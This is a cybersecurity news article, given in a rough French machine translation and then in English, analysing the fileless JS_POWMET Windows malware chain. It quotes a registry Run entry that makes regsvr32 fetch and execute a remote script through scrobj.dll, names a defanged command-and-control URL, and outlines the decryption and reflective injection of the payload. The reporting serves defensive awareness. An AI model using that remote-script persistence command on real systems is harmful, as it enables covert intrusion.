CYBER NOUVELLES

JS_PLOWMET Fileless de Windows Malware ne laisse aucune trace d'intrusion

Comme les cybercriminels deviennent progressivement sophistiqués et novateurs dans leurs activités criminelles, le nouveau malware fileless de JS_PLOWMET rend de plus en plus difficile pour les experts de sécurité pour suivre et localiser les logiciels malveillants lorsqu'une intrusion se produit. Le logiciel malveillant est rapporté à ne laisser aucune trace de son existence sur la machine rendant ainsi plus difficile pour les experts chargés d'analyser son contenu.

Nature et livraison de JS_PLOWMET

Le logiciel malveillant de Windows a récemment été repéré par des experts en cybersécurité et a dit à présenter un bout en bout la chaîne d'infection fileless, ce qui signifie qu'il sera plus difficile d'analyser à l'aide d'un bac à sable. Les experts disent que le cheval de Troie spécifique arrive sur le système d'un utilisateur via la procédure d'enregistrement de démarrage automatique. En outre, le logiciel malveillant s'installe sur le disque dur sans laisser de trace facilement visible de son existence sur la machine. On estime que près de 90% du JS_PLOWMET Les infections sont basées dans la région Asie-Pacifique.

histoire connexes: Fileless Malware Plagues 140 Banques Across 40 Des pays

Pour l'instant, on ne sait pas de la méthode exacte de la JS_PLOWMET est transféré sur le système d'un utilisateur. Cependant, il est fort probable que le logiciel malveillant est téléchargé sous forme de fichier XML contenant JavaScript malveillant transmis via l'entrée de Registre de démarrage automatique. Il est très probable que la plupart des infections se produisent en raison soit des sites Web malveillants ou de logiciels malveillants droppers.

Sans aucun doute le concept de logiciels malveillants fileless est une approche ruse du côté des cybercriminels et bien qu'il puisse être un événement rare, ces concepts ne sont pas étrangers à la communauté de la cybersécurité. Aussi récemment que le malware fileless « SOREBRECT » a été découverte par des experts autour de début Juin 2017, de telles attaques devraient croître progressivement plus fréquents, potentiellement se généraliser. Pour la majorité des logiciels malveillants fileless, leur nature intraçable ne peut pas être suivi dans la mesure où ils entrent dans le système d'un utilisateur, à partir de là leur présence est généralement révélée une fois le logiciel malveillant exécute son but. La question réside dans le fait que si la plupart des logiciels malveillants fileless se révéler après l'exécution de leur charge utile malveillante, JS_PLOWMET est l'exception dans ce cas.

JS_PLOWMET En vertu d'un examen plus approfondi

Les experts ont clairement fait savoir que le temps JS_PLOWMET logiciel malveillant est téléchargé, le Registre suivante a déjà été modifié:

HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion Run
COM + = « regsvr32 / s / a / u / i:{URL malicieuse, téléchargements JS_POWMET} scrobj.dll »

Les descriptions des paramètres suivants utilisés par « regsvr32 » sont les suivantes:

  1. /s = option de silence regsvr32
  2. /n = dit regsvr32 ne pas utiliser DllRegisterServer
  3. /u = serveur Unregister / object
  4. /i = utilisé pour faire passer un paramètre facultatif (c'est à dire. URL) à DllInstall
  5. scrobj.dll = Composant Script de Microsoft Runtime

Dans son mode d'exécution, la JS_PLOWMET Cheval de Troie relaie une URL à regsvr32 (serveur registre Microsoft) en tant que paramètre, regsvr32 essentiellement convaincante pour télécharger le fichier situé sur l'URL. Ainsi, regsvr32 est facilitée afin d'exécuter des scripts arbitraires sans avoir à enregistrer le fichier XML sur la machine. Efficacement, chaque fois que la machine démarre, il téléchargera automatiquement le fichier malveillant de son commandement & Contrôle (C&C) serveur.

Une fois la JS_PLOWMET logiciel malveillant est exécuté, un autre fichier connu sous le nom TROJ_PSINJECT est téléchargé - un script Powershell, qui à son tour se connecte à un site Web dans le téléchargement lui-même un autre fichier appelé « favicon »:

hxxps://bogerando[.]ru / favicon

Le fichier « favicon » est ensuite décrypté et initié dans son processus fonctionnel en utilisant ReflectivePELoader - utilisé pour injecter des fichiers EXE / DLL.

Il est utile d'examiner le code malveillant dans une perspective plus proche afin de discerner adéquatement ses fonctions. Pour commencer, le logiciel malveillant contient base64 chaîne qui sera affectée à être décodé et décrypté par la clé RC4. Les descendants de ce décryptage sera une chaîne compressée gzip qui est décompressé par le malware lui-même en utilisant la routine GZIP décompression. Enfin, Cela nous amène au déploiement des codes pour la fonction ReflectivePELoader qui seront utilisés pour charger le fichier téléchargé déchiffré.

D'autre part, Favicon sera également décrypté en utilisant la même clé RC4, en effet obtenu dans le fichier DLL malveillant par le nom de BKDR_ANDROM. Le fichier ne sera pas enregistré sur la machine, plutôt, il sera injecté dans le processus powershell.exe. Les experts disent que cette partie du processus est également fileless. En effet, toutes ces routines sont exécutées par les logiciels malveillants en utilisant les commandes PowerShell.


Code TROJ_PSINJECT montrant un procédé de désobfuscation.

Qu'est-ce qui se passe ensuite est que powershell.exe sera mis fin par BKDR_ANDROM si elle se trouve en cours d'exécution dans le système, ainsi que d'être en mesure de recueillir les informations suivantes de la machine:

  • Racine Volume Numéro de série.
  • Système d'exploitation Version.
  • Adresse IP locale.
  • Les privilèges d'administrateur.

La JS_POWMET serait éventuellement ajouter dans les entrées de registre dans le système d'exploitation afin d'assurer qu'il exécute toujours au démarrage. En outre, la commande PowerShell codée base64 peut être décodé par l'entrée de Registre de démarrage automatique, qui à son tour sera utilisée pour déchiffrer les données binaires cryptées qui se traduira par les codes malveillants de BKDR_ANDROM. Le processus impliqué à partir de là reste assez simple; après le décryptage est finalisé, il exécutera alors les codes malveillants décryptées.

histoire connexes: Mise à jour TrickBot bancaires cheval de Troie, WannaCry-Inspired Module maintenant actif

Conclusion

En conclusion, tandis que les experts disent que JS_POWMET et le reste des fichiers qui sont téléchargés avec elle sont relativement légers en termes de dommages causés, le malware lui-même montre les longueurs cybercriminels seraient et iront à éviter d'être détectés et leurs programmes malveillants pris à part et analysé. Cybersécurité est une façon continue et le domaine en constante évolution des possibilités et des méthodes d'infection relativement rares impliquant des logiciels malveillants fileless ne font pas exception à ce paradigme. Bien qu'il puisse être difficile de nous préparer adéquatement pour les attaques de logiciels malveillants fileless à l'avenir en raison de leur difficulté d'être détectée assez rapidement, les experts recommandent de désactiver la recherche en Powershell lui-même pour aider à atténuer les effets de la JS_POWMET et la multiplicité des charges utiles inclus avec elle.

Kristian Iliev

Kristian Iliev

étudiant en deuxième année à l'Université d'Edimbourg étudier l'anthropologie sociale et la politique sociale. passionné de Avid rien à voir avec IT, films et réparations de montres.

Plus de messages

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont marqués *

Délai est épuisé. S'il vous plaît recharger CAPTCHA.

Partager sur Facebook Partager
Loading ...
Partager sur Twitter Tweet
Loading ...
Partager sur Google Plus Partager
Loading ...
Partager sur Linkedin Partager
Loading ...
Partager sur Digg Partager
Partager sur Reddit Partager
Loading ...
Partager sur Stumbleupon Partager
Loading ...

CYBER NEWS

JS_PLOWMET Fileless Windows Malware Leaves No Trace of Intrusion

As cybercriminals become progressively sophisticated and innovative in their criminal endeavours, the new fileless JS_PLOWMET malware makes it increasingly difficult for security experts to trace and locate the malware when an intrusion occurs. The malware is reported to leave no trace of its existence on the machine hence making it harder for experts to analyze its contents.

Nature and Delivery of JS_PLOWMET

The Windows malware was recently spotted by cybersecurity experts and said to feature an end-to-end fileless infection chain, meaning it will be more difficult to analyse using a sandbox. Experts say the specific Trojan arrives on a user’s system via the auto-start registry procedure. Furthermore, the malware installs itself on the hard drive without leaving a readily visible trace of its existence on the machine. It is estimated that nearly 90% of the JS_PLOWMET infections are based in the Asia-Pacific region.

Related Story: Fileless Malware Plagues 140 Banks Across 40 Countries

As of yet, it is unclear of the exact method the JS_PLOWMET is transferred on to a user’s system. However, it is most likely that the malware is downloaded as an XML file containing malicious JavaScript passed on via the auto-start registry entry. It is most likely that most infections occur due to either visiting malicious websites or malware droppers.

Without a doubt the concept of fileless malware is a cunning approach on the side of cybercriminals and although it might be a rare occurrence, such concepts are not alien to the cybersecurity community. As recently as the “SOREBRECT” fileless malware was discovered by experts around early June 2017, such attacks are expected to gradually grow more common, potentially become widespread. For the majority of fileless malware, their untraceable nature cannot be tracked insofar as they enter a user’s system, from there on their presence is generally revealed once the malware executes its purpose. The issue lies in the fact that whilst most fileless malware reveal themselves after executing their malicious payload, JS_PLOWMET is the exception in this case.

JS_PLOWMET Under a Closer Inspection

Experts have made it clear that by the time JS_PLOWMET malware is downloaded, the following registry has already been changed:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
COM+ = “regsvr32 /s /n /u /i:{Malicious URL, downloads JS_POWMET} scrobj.dll”

The descriptions of the following parameters used by “regsvr32” are as follows:

  1. /s = silent option for regsvr32
  2. /n = tells regsvr32 not to use DllRegisterServer
  3. /u = Unregister server/object
  4. /i = used for passing an optional parameter (ie. URL) to DLLinstall
  5. scrobj.dll = Microsoft’s Script Component Runtime

In its method of execution, the JS_PLOWMET Trojan relays an URL to regsvr32 (Microsoft register server) as a parameter, essentially compelling regsvr32 to download the file located on the URL. Thus, regsvr32 is facilitated in order to execute arbitrary scripts without having to save the XML file on the machine. Effectively, whenever the machine starts up, it will automatically download the malicious file from its Command & Control (C&C) server.

Once the JS_PLOWMET malware is executed, a different file known as TROJ_PSINJECT is downloaded – a Powershell script, which in turn connects to a website in itself downloading another file called “favicon”:

hxxps://bogerando[.]ru/favicon

The “favicon” file is thereafter decrypted and initiated into its functional process using ReflectivePELoader – used for injecting EXE/DLL files.

It is beneficial to look at the malware code from a closer perspective in order to adequately discern its functions. To start off, the malware contains Base64 String that will in effected be decoded and decrypted by the RC4 key. The offspring of this decryption will be a GZIP-compressed string that is decompressed by the malware itself by using the GZIP-decompression routine. Finally, this brings us to the unfolding of the codes for the ReflectivePELoader function that will be used to load the decrypted downloaded file.

On the other hand, Favicon will also be decrypted using the very same RC4 key, in effect resulting in the malicious DLL file by the name of BKDR_ANDROM. The file will not be saved onto the machine, rather it will be injected into the powershell.exe process. Experts say this part of the process is also fileless. In effect, all of these routines are executed by the malware using PowerShell commands.


TROJ_PSINJECT code showing deobfuscation process.

What happens next is that powershell.exe will be terminated by BKDR_ANDROM if it is found running in the system as well as being able to gather the following information from the machine:

  • Root Volume Serial Number.
  • Operating System Version.
  • Local IP Address.
  • Administrator Privileges.

The JS_POWMET would eventually add in registry entries into the operating system in order to ensure it always executes during start-up. Furthermore, the Base64-encoded PowerShell command is able to be decoded by the auto-start registry entry, which in turn will be used to decrypt the encrypted binary data that will result in the malicious codes of BKDR_ANDROM. The process involved from there on remains pretty simple; after the decryption is finalised, it will then execute the decrypted malicious codes.

Related Story: TrickBot Banking Trojan Updated, WannaCry-Inspired Module Now Active

Conclusion

In conclusion, while experts say that JS_POWMET and the rest of the files that are downloaded with it are relatively light in terms of damage caused, the malware itself demonstrates the lengths cybercriminals would and will go to avoid being detected and their malware picked apart and analysed. Cybersecurity is a continuously and ever-evolving realm of possibilities and relatively uncommon infection methods involving fileless malware are no exception to this paradigm. While it may be hard to adequately prepare ourselves for fileless malware attacks in the future due to their difficulty of being detected quickly enough, experts recommend looking into disabling Powershell itself to help mitigate the effects of JS_POWMET and the multiplicity of payloads included with it.

Kristian Iliev

Kristian Iliev

Second year student at The University of Edinburgh studying Social Anthropology and Social Policy. Avid enthusiast of anything to do with IT, films and watch repairs.

More Posts

Leave a Comment

Your email address will not be published. Required fields are marked *

Time limit is exhausted. Please reload CAPTCHA.

Share on Facebook Share
Loading...
Share on Twitter Tweet
Loading...
Share on Google Plus Share
Loading...
Share on Linkedin Share
Loading...
Share on Digg Share
Share on Reddit Share
Loading...
Share on Stumbleupon Share
Loading...